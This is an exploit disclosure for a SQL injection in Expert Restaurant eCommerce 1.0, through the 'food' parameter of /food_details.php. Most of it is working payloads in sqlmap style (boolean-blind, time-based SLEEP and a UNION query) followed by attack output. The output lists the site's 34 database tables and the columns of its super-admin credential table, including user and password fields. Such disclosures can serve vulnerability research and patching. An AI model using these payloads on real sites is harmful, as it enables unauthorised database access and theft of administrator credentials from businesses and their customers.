Expert Restaurant eCommerce version 1.0 suffers from a remote SQL injection vulnerability.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Vulnerability ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr :
β Website : https://www.codester.com/items/20872/ β
β Vendor : Expert IT Solution β
β Software : Expert Restaurant eCommerce 1.0 β
β Vuln Type: SQL Injection β
β Impact : Database Access β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β β
β SQL injection attacks can allow unauthorized access to sensitive data, modification of β
β data and crash the application or make it unavailable, leading to lost revenue and β
β damage to a company's reputation. β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2023 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Path: /food_details.php
https://www.website/food_details.php?food=[SQLI]
GET parameter 'food' is vulnerable to SQL Injection
---
Parameter: food (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[+] Starting the Attack
fetching current database
current database: 'sagor_****_restu'
fetching tables
[34 tables]
+--------------------------+
| add_to_cart_view |
| admin_url |
| contact_manage |
| currencies |
| customer_info |
| delivery_live_status |
| expense_manage |
| food_category |
| food_dish_manage |
| food_dish_vari_man |
| food_field_variant |
| food_field_variant_value |
| food_order_confirm |
| food_review |
| food_sub_category |
| food_tag |
| gallery_manage |
| hall_manage |
| income_manage |
| kitchen_live_sta |
| menu_manage |
| opening_manage |
| order_accounts |
| order_other_address |
| page_manage |
| payment_gateway |
| shipping_charge |
| site_setting |
| slider_manage |
| social_manage |
| sup_ad_log |
| table_book |
| table_manage |
| team_manage |
+--------------------------+
fetching columns for table 'sup_ad_log'
[5 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| status | varchar(100) |
| id | int(11) |
| sup_admin_name | varchar(100) |
| sup_pass | varchar(100) |
| sup_user | varchar(100) |
+----------------+--------------+
[-] Done
